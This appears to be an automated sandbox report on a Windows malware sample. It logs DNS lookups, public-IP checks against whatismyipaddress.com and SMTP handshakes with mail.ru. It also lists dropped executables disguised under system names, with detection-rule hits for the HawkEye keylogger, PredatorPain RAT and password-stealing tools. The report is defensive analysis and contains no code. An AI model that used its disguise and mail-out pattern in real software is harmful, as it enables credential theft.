                                                                    Sep 6, 2021 11:22:08.247072935 CEST6015253192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:08.284501076 CEST53601528.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:24.427344084 CEST5754453192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:24.463366985 CEST53575448.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:25.379049063 CEST5598453192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:25.416760921 CEST53559848.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:25.762196064 CEST6418553192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:25.795854092 CEST53641858.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:28.858500957 CEST6511053192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:28.886203051 CEST53651108.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:33.189950943 CEST5836153192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:33.217931986 CEST53583618.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:33.759963989 CEST6349253192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:33.789587975 CEST53634928.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:35.330713034 CEST6083153192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:35.358179092 CEST53608318.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:35.471806049 CEST6010053192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:35.498379946 CEST53601008.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:37.047529936 CEST5319553192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:37.079185963 CEST53531958.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:37.460223913 CEST5014153192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:37.496215105 CEST53501418.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:37.906306982 CEST5302353192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:37.906943083 CEST4956353192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:37.933733940 CEST53530238.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:37.934645891 CEST53495638.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:38.050973892 CEST5135253192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:38.080091953 CEST53513528.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:41.515290976 CEST5934953192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:41.548307896 CEST53593498.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:54.897388935 CEST5708453192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:54.923737049 CEST53570848.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:59.577109098 CEST5882353192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:59.614623070 CEST53588238.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:22:59.882579088 CEST5756853192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:22:59.913769007 CEST53575688.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:00.002063990 CEST5054053192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:00.039280891 CEST53505408.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:02.271364927 CEST5436653192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:02.305356979 CEST53543668.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:03.534266949 CEST5303453192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:03.574574947 CEST53530348.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:09.484256029 CEST5776253192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:09.517220020 CEST53577628.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:09.698349953 CEST5543553192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:09.735904932 CEST53554358.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:14.123003960 CEST5071353192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:14.161180019 CEST53507138.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:19.028017044 CEST5613253192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:19.074403048 CEST53561328.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:33.634174109 CEST5898753192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:33.677450895 CEST53589878.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:48.283610106 CEST5657953192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:48.327076912 CEST53565798.8.8.8192.168.2.3
                                                                    Sep 6, 2021 11:23:49.259216070 CEST6063353192.168.2.38.8.8.8
                                                                    Sep 6, 2021 11:23:49.294157982 CEST53606338.8.8.8192.168.2.3

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Sep 6, 2021 11:22:24.427344084 CEST192.168.2.38.8.8.80x3330Standard query (0)smtp.mail.ruA (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:25.379049063 CEST192.168.2.38.8.8.80x5300Standard query (0)160.192.10.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                    Sep 6, 2021 11:22:25.762196064 CEST192.168.2.38.8.8.80xdc7dStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:33.189950943 CEST192.168.2.38.8.8.80x3569Standard query (0)160.192.10.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                    Sep 6, 2021 11:22:33.759963989 CEST192.168.2.38.8.8.80x2eafStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:35.330713034 CEST192.168.2.38.8.8.80x3eedStandard query (0)smtp.mail.ruA (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:35.471806049 CEST192.168.2.38.8.8.80xfb08Standard query (0)smtp.mail.ruA (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:37.460223913 CEST192.168.2.38.8.8.80xaec1Standard query (0)smtp.mail.ruA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Sep 6, 2021 11:22:24.463366985 CEST8.8.8.8192.168.2.30x3330No error (0)smtp.mail.ru94.100.180.160A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:24.463366985 CEST8.8.8.8192.168.2.30x3330No error (0)smtp.mail.ru217.69.139.160A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:25.416760921 CEST8.8.8.8192.168.2.30x5300Name error (3)160.192.10.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                    Sep 6, 2021 11:22:25.795854092 CEST8.8.8.8192.168.2.30xdc7dNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:25.795854092 CEST8.8.8.8192.168.2.30xdc7dNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:33.217931986 CEST8.8.8.8192.168.2.30x3569Name error (3)160.192.10.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                    Sep 6, 2021 11:22:33.789587975 CEST8.8.8.8192.168.2.30x2eafNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:33.789587975 CEST8.8.8.8192.168.2.30x2eafNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:35.358179092 CEST8.8.8.8192.168.2.30x3eedNo error (0)smtp.mail.ru94.100.180.160A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:35.358179092 CEST8.8.8.8192.168.2.30x3eedNo error (0)smtp.mail.ru217.69.139.160A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:35.498379946 CEST8.8.8.8192.168.2.30xfb08No error (0)smtp.mail.ru94.100.180.160A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:35.498379946 CEST8.8.8.8192.168.2.30xfb08No error (0)smtp.mail.ru217.69.139.160A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:37.496215105 CEST8.8.8.8192.168.2.30xaec1No error (0)smtp.mail.ru94.100.180.160A (IP address)IN (0x0001)
                                                                    Sep 6, 2021 11:22:37.496215105 CEST8.8.8.8192.168.2.30xaec1No error (0)smtp.mail.ru217.69.139.160A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • whatismyipaddress.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.349712104.16.154.3680C:\Users\user\AppData\Local\Temp\taskhost.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Sep 6, 2021 11:22:25.848732948 CEST1205OUTGET / HTTP/1.1
                                                                    Host: whatismyipaddress.com
                                                                    Connection: Keep-Alive
                                                                    Sep 6, 2021 11:22:25.883661032 CEST1205INHTTP/1.1 403 Forbidden
                                                                    Date: Mon, 06 Sep 2021 09:22:25 GMT
                                                                    Content-Type: text/plain; charset=UTF-8
                                                                    Content-Length: 16
                                                                    Connection: keep-alive
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 68a6a1ff98f21782-FRA
                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                    Data Ascii: error code: 1020


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.349715104.16.154.3680C:\Users\user\AppData\Local\Temp\taskhost.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Sep 6, 2021 11:22:33.865338087 CEST1235OUTGET / HTTP/1.1
                                                                    Host: whatismyipaddress.com
                                                                    Connection: Keep-Alive
                                                                    Sep 6, 2021 11:22:33.904181004 CEST1236INHTTP/1.1 403 Forbidden
                                                                    Date: Mon, 06 Sep 2021 09:22:33 GMT
                                                                    Content-Type: text/plain; charset=UTF-8
                                                                    Content-Length: 16
                                                                    Connection: keep-alive
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 68a6a231bab84ed9-FRA
                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                    Data Ascii: error code: 1020


                                                                    SMTP Packets

                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                    Sep 6, 2021 11:22:24.654927015 CEST5874971194.100.180.160192.168.2.3220 smtp57.i.mail.ru ESMTP ready (Looking for Mail for your domain? Visit https://biz.mail.ru)
                                                                    Sep 6, 2021 11:22:24.655308962 CEST49711587192.168.2.394.100.180.160EHLO 704672
                                                                    Sep 6, 2021 11:22:24.710182905 CEST5874971194.100.180.160192.168.2.3250-smtp57.i.mail.ru
                                                                    250-SIZE 73400320
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250 STARTTLS
                                                                    Sep 6, 2021 11:22:24.710491896 CEST49711587192.168.2.394.100.180.160STARTTLS
                                                                    Sep 6, 2021 11:22:24.764374018 CEST5874971194.100.180.160192.168.2.3220 2.0.0 Start TLS
                                                                    Sep 6, 2021 11:22:35.477663994 CEST5874971894.100.180.160192.168.2.3220 smtp29.i.mail.ru ESMTP ready (Looking for Mail for your domain? Visit https://biz.mail.ru)
                                                                    Sep 6, 2021 11:22:35.564328909 CEST49718587192.168.2.394.100.180.160EHLO 704672
                                                                    Sep 6, 2021 11:22:35.616727114 CEST5874971894.100.180.160192.168.2.3250-smtp29.i.mail.ru
                                                                    250-SIZE 73400320
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250 STARTTLS
                                                                    Sep 6, 2021 11:22:35.617120028 CEST49718587192.168.2.394.100.180.160STARTTLS
                                                                    Sep 6, 2021 11:22:35.668801069 CEST5874971894.100.180.160192.168.2.3220 2.0.0 Start TLS
                                                                    Sep 6, 2021 11:22:35.688143015 CEST5874971994.100.180.160192.168.2.3220 smtp36.i.mail.ru ESMTP ready (Looking for Mail for your domain? Visit https://biz.mail.ru)
                                                                    Sep 6, 2021 11:22:35.689376116 CEST49719587192.168.2.394.100.180.160EHLO 704672
                                                                    Sep 6, 2021 11:22:35.741569996 CEST5874971994.100.180.160192.168.2.3250-smtp36.i.mail.ru
                                                                    250-SIZE 73400320
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250 STARTTLS
                                                                    Sep 6, 2021 11:22:35.741786003 CEST49719587192.168.2.394.100.180.160STARTTLS
                                                                    Sep 6, 2021 11:22:35.794620991 CEST5874971994.100.180.160192.168.2.3220 2.0.0 Start TLS
                                                                    Sep 6, 2021 11:22:37.609016895 CEST5874972194.100.180.160192.168.2.3220 smtp32.i.mail.ru ESMTP ready (Looking for Mail for your domain? Visit https://biz.mail.ru)
                                                                    Sep 6, 2021 11:22:37.609217882 CEST49721587192.168.2.394.100.180.160EHLO 704672
                                                                    Sep 6, 2021 11:22:37.660432100 CEST5874972194.100.180.160192.168.2.3250-smtp32.i.mail.ru
                                                                    250-SIZE 73400320
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250 STARTTLS
                                                                    Sep 6, 2021 11:22:37.660605907 CEST49721587192.168.2.394.100.180.160STARTTLS
                                                                    Sep 6, 2021 11:22:37.713546038 CEST5874972194.100.180.160192.168.2.3220 2.0.0 Start TLS

                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: aaVb1xEmrd.exe PID: 2432 Parent PID: 5472

                                                                    General

                                                                    Start time:11:22:15
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\user\Desktop\aaVb1xEmrd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\aaVb1xEmrd.exe'
                                                                    Imagebase:0x400000
                                                                    File size:835015 bytes
                                                                    MD5 hash:C428B176ECA6B17CDA3F5729ABADDF0B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: MULTIBOT_NEWW.exe PID: 4768 Parent PID: 2432

                                                                    General

                                                                    Start time:11:22:16
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe'
                                                                    Imagebase:0x7ff7488e0000
                                                                    File size:106496 bytes
                                                                    MD5 hash:3F620FFD8BE649D1D31AB54F73A559BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Visual Basic
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: svchost.exe PID: 4280 Parent PID: 2432

                                                                    General

                                                                    Start time:11:22:17
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\svchost.exe'
                                                                    Imagebase:0xf30000
                                                                    File size:57344 bytes
                                                                    MD5 hash:A273A781070D239BA99D3FD8EF341E6C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: taskhost.exe PID: 4548 Parent PID: 2432

                                                                    General

                                                                    Start time:11:22:17
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\taskhost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\taskhost.exe'
                                                                    Imagebase:0x9c0000
                                                                    File size:533504 bytes
                                                                    MD5 hash:83827B8CFFE67A789B03E342ED3B1572
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: iExplorer.exe PID: 1352 Parent PID: 2432

                                                                    General

                                                                    Start time:11:22:18
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\iExplorer.exe'
                                                                    Imagebase:0x6d0000
                                                                    File size:724480 bytes
                                                                    MD5 hash:A0DBD1314D214588960B1E0BCED5F4E0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: Windows Update.exe PID: 5204 Parent PID: 1352

                                                                    General

                                                                    Start time:11:22:27
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Roaming\Windows Update.exe'
                                                                    Imagebase:0x3d0000
                                                                    File size:724480 bytes
                                                                    MD5 hash:A0DBD1314D214588960B1E0BCED5F4E0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000000.283523438.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000000.293259909.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
